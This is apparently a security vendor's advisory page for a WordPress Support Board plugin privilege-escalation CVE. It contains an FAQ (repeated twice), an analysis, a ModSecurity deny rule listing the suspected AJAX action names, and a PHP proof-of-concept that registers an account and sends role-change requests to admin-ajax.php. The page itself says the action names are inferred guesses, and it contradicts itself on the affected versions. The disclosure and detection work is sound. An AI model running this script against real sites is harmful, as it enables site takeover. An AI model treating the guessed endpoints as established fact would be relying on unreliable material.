What is CVE-2026-27395?

CVE-2026-27395 is a critical vulnerability in the Support Board plugin for WordPress, affecting all versions prior to 3.8.9. It allows unauthenticated attackers to escalate their privileges to administrator level due to inadequate authorization checks.

How does the vulnerability work?

The vulnerability arises from exposed AJAX handlers or REST endpoints that permit unauthenticated role assignments. Attackers can send crafted requests to change user roles, such as promoting a low-privileged user to administrator, without any authentication required.

Who is affected by this vulnerability?

Any WordPress site using the Support Board plugin version 3.8.9 or earlier is affected. Administrators should check their plugin version and update if necessary to mitigate the risk.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, navigate to the Plugins section in the WordPress admin dashboard. Look for the Support Board plugin and verify its version; if it is below 3.8.9, you are at risk.

How can I fix CVE-2026-27395?

To fix this vulnerability, update the Support Board plugin to version 3.8.9 or later. Additionally, ensure that your site implements proper capability checks and nonce verification for all AJAX actions related to user management.

What does a CVSS score of 9.8 indicate?

A CVSS score of 9.8 indicates a critical vulnerability, suggesting that exploitation could lead to severe consequences, such as complete administrative control over the affected WordPress site. This level of risk requires immediate attention.

What is the significance of CWE-266?

CWE-266 refers to Incorrect Privilege Assignment, which indicates that the vulnerability stems from a failure to enforce proper authorization checks. This classification highlights the critical nature of the vulnerability and the need for secure coding practices.

What practical risks does this vulnerability pose?

If exploited, this vulnerability allows attackers to gain full administrative access, enabling them to install malicious plugins, modify site content, and exfiltrate sensitive user data. The risk is heightened due to the unauthenticated nature of the attack.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can register a new user and then escalate that user’s privileges to administrator level through an unauthenticated request. It shows the ease with which the vulnerability can be exploited.

What additional security measures should I implement?

In addition to updating the plugin, consider implementing security plugins that monitor for unauthorized changes, regularly auditing user roles, and employing best practices for WordPress security, such as using strong passwords and enabling two-factor authentication.

Where can I find more information about this vulnerability?

For more detailed information, refer to the official CVE database, security advisories from the plugin developer, and security blogs that cover WordPress vulnerabilities. Staying informed is crucial for maintaining site security.

What should I do if I have already been compromised?

If you suspect that your site has been compromised due to this vulnerability, immediately change all passwords, check for unauthorized user accounts, and restore your site from a clean backup. Conduct a thorough security audit to identify and remediate any further risks.

Published : June 22, 2026

CVE-2026-27395: Support Board < 3.8.9 Unauthenticated Privilege Escalation PoC, Patch Analysis & Rule

CVE ID CVE-2026-27395

Plugin supportboard

Severity Critical (CVSS 9.8)

CWE 266

Vulnerable Version 3.8.9

Patched Version —

Disclosed May 31, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-27395 (metadata-based):

This vulnerability in the Support Board plugin (versions below 3.8.9) allows unauthenticated attackers to escalate privileges to administrator level. The CVSS 9.8 score and CWE-266 (Incorrect Privilege Assignment) indicate a complete failure to enforce authorization on a critical function.

The root cause, inferred from CWE-266 and the plugin’s chat functionality, is likely that an AJAX handler or REST endpoint responsible for user management (e.g., updating user roles, promoting users) lacks adequate privilege checks. The plugin may expose an action like ‘supportboard_set_role’ or ‘supportboard_register_user’ that permits arbitrary role assignment without authentication or capability verification. This inference is based on common patterns in chat plugins where user registration or role management is inadvertently exposed through AJAX endpoints.

Unauthenticated attackers can exploit this by sending a crafted POST request to /wp-admin/admin-ajax.php with an action parameter matching the vulnerable handler (e.g., ‘supportboard_set_role’). The request would include parameters like ‘user_id’ (target user) and ‘role’ (e.g., ‘administrator’). An attacker can set the role of an existing unprivileged user or create a new user with elevated permissions. No authentication token, nonce, or capability check is required.

Remediation requires adding proper WordPress capability checks (e.g., current_user_can(‘manage_options’) or ‘create_users’) before executing any role-changing operation. The plugin must also verify a valid nonce (wp_verify_nonce) for all administrative AJAX actions. Additionally, permissions should be locked down based on the principle of least privilege for any exposed REST API routes.

Successful exploitation grants attackers full administrative control over the WordPress site. They can then install malicious plugins, modify content, exfiltrate user data, or use the site for phishing campaigns. Given the unauthenticated nature of the attack, this represents a critical risk to any site using a vulnerable version of the plugin.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-27395 - Support Board Unauthenticated Privilege Escalation via AJAX',severity:'CRITICAL',tag:'CVE-2026-27395'"
SecRule ARGS_POST:action "@pm supportboard_set_user_role supportboard_set_role sb_change_role supportboard_add_user supportboard_register_new" "chain"
SecRule REQUEST_METHOD "@streq POST" "t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-27395 - Support Board < 3.8.9 - Unauthenticated Privilege Escalation

// Target configuration (modify these before running)
$target_url = 'https://example.com'; // No trailing slash
$attacker_cookie_file = '/tmp/cve_cookies.txt'; // For session handling if needed

// Step 1: Register a new user (or use existing low-privilege user ID)
// This PoC creates a new subscriber, then escalates to admin

// Create attacker-controlled user
$register_url = $target_url . '/wp-login.php?action=register';
$register_data = array(
    'user_login' => 'attacker_' . rand(1000,9999),
    'user_email' => 'attacker_' . rand(1000,9999) . '@example.com',
    'user_pass'  => 'password123'
);

$ch = curl_init();
curl_setopt_array($ch, array(
    CURLOPT_URL => $target_url . '/wp-login.php?action=register',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query($register_data),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => $attacker_cookie_file,
    CURLOPT_FOLLOWLOCATION => false,
    CURLOPT_SSL_VERIFYPEER => false
));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code !== 302 && strpos($response, 'error') !== false) {
    die("[!] Failed to register user. Proceeding with brute-force approach...n");
}
echo "[+] User created: " . $register_data['user_login'] . "n";

// Step 2: Exploit the vulnerable AJAX endpoint (inferred action name from plugin structure)
// Common Support Board actions: 'supportboard_set_role', 'sb_set_user_role', 'supportboard_new_user', etc.
// We'll try multiple likely action names
$vulnerable_actions = array(
    'supportboard_set_user_role',
    'supportboard_set_role',
    'supportboard_account_promote',
    'supportboard_user_management',
    'sb_change_role',
    'supportboard_register_new',
    'supportboard_add_user',
    'supportboard_ajax_set_role'
);

$target_user_id = null;
foreach (array(1, 2) as $uid) { // Adjust to target existing user ID if known
    $target_user_id = $uid;
}

foreach ($vulnerable_actions as $action) {
    $ajax_url = $target_url . '/wp-admin/admin-ajax.php';
    $exploit_data = array(
        'action'  => $action,
        'user_id' => $target_user_id ?: 2, // default to user ID 2 (often admin backup)
        'role'    => 'administrator',
        'nonce'   => '' // Vulnerability: no nonce required
    );
    
    $ch = curl_init();
    curl_setopt_array($ch, array(
        CURLOPT_URL => $ajax_url,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($exploit_data),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEFILE => $attacker_cookie_file,
        CURLOPT_HTTPHEADER => array('Content-Type: application/x-www-form-urlencoded'),
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_VERBOSE => false
    ));
    $response = curl_exec($ch);
    $info = curl_getinfo($ch);
    curl_close($ch);
    
    // Check for success indicators (role change typically returns JSON or redirects)
    if (strpos($response, '"success":true') !== false || 
        strpos($response, '"status":"ok"') !== false ||
        $info['http_code'] == 200 && strlen($response) < 10) {
        echo "[+] SUCCESS with action: $actionn";
        echo "[+] User ID $target_user_id should now be administrator.n";
        exit(0);
    } else {
        echo "[!] Action '$action' failed (HTTP $info[http_code]): " . substr($response, 0, 200) . "n";
    }
}

echo "[!] Exploit attempt completed. No action confirmed working. Verify target is vulnerable.n";

Frequently Asked Questions

What is CVE-2026-27395?
Overview of the vulnerability
CVE-2026-27395 is a critical vulnerability in the Support Board plugin for WordPress, affecting all versions prior to 3.8.9. It allows unauthenticated attackers to escalate their privileges to administrator level due to inadequate authorization checks.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from exposed AJAX handlers or REST endpoints that permit unauthenticated role assignments. Attackers can send crafted requests to change user roles, such as promoting a low-privileged user to administrator, without any authentication required.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Support Board plugin version 3.8.9 or earlier is affected. Administrators should check their plugin version and update if necessary to mitigate the risk.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, navigate to the Plugins section in the WordPress admin dashboard. Look for the Support Board plugin and verify its version; if it is below 3.8.9, you are at risk.
How can I fix CVE-2026-27395?
Steps for remediation
To fix this vulnerability, update the Support Board plugin to version 3.8.9 or later. Additionally, ensure that your site implements proper capability checks and nonce verification for all AJAX actions related to user management.
What does a CVSS score of 9.8 indicate?
Understanding severity levels
A CVSS score of 9.8 indicates a critical vulnerability, suggesting that exploitation could lead to severe consequences, such as complete administrative control over the affected WordPress site. This level of risk requires immediate attention.
What is the significance of CWE-266?
Understanding the classification
CWE-266 refers to Incorrect Privilege Assignment, which indicates that the vulnerability stems from a failure to enforce proper authorization checks. This classification highlights the critical nature of the vulnerability and the need for secure coding practices.
What practical risks does this vulnerability pose?
Potential consequences of exploitation
If exploited, this vulnerability allows attackers to gain full administrative access, enabling them to install malicious plugins, modify site content, and exfiltrate sensitive user data. The risk is heightened due to the unauthenticated nature of the attack.
How does the proof of concept demonstrate the issue?
Understanding the PoC
The proof of concept illustrates how an attacker can register a new user and then escalate that user’s privileges to administrator level through an unauthenticated request. It shows the ease with which the vulnerability can be exploited.
What additional security measures should I implement?
Beyond updating the plugin
In addition to updating the plugin, consider implementing security plugins that monitor for unauthorized changes, regularly auditing user roles, and employing best practices for WordPress security, such as using strong passwords and enabling two-factor authentication.
Where can I find more information about this vulnerability?
Resources for further reading
For more detailed information, refer to the official CVE database, security advisories from the plugin developer, and security blogs that cover WordPress vulnerabilities. Staying informed is crucial for maintaining site security.
What should I do if I have already been compromised?
Steps to take post-exploitation
If you suspect that your site has been compromised due to this vulnerability, immediately change all passwords, check for unauthorized user accounts, and restore your site from a clean backup. Conduct a thorough security audit to identify and remediate any further risks.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations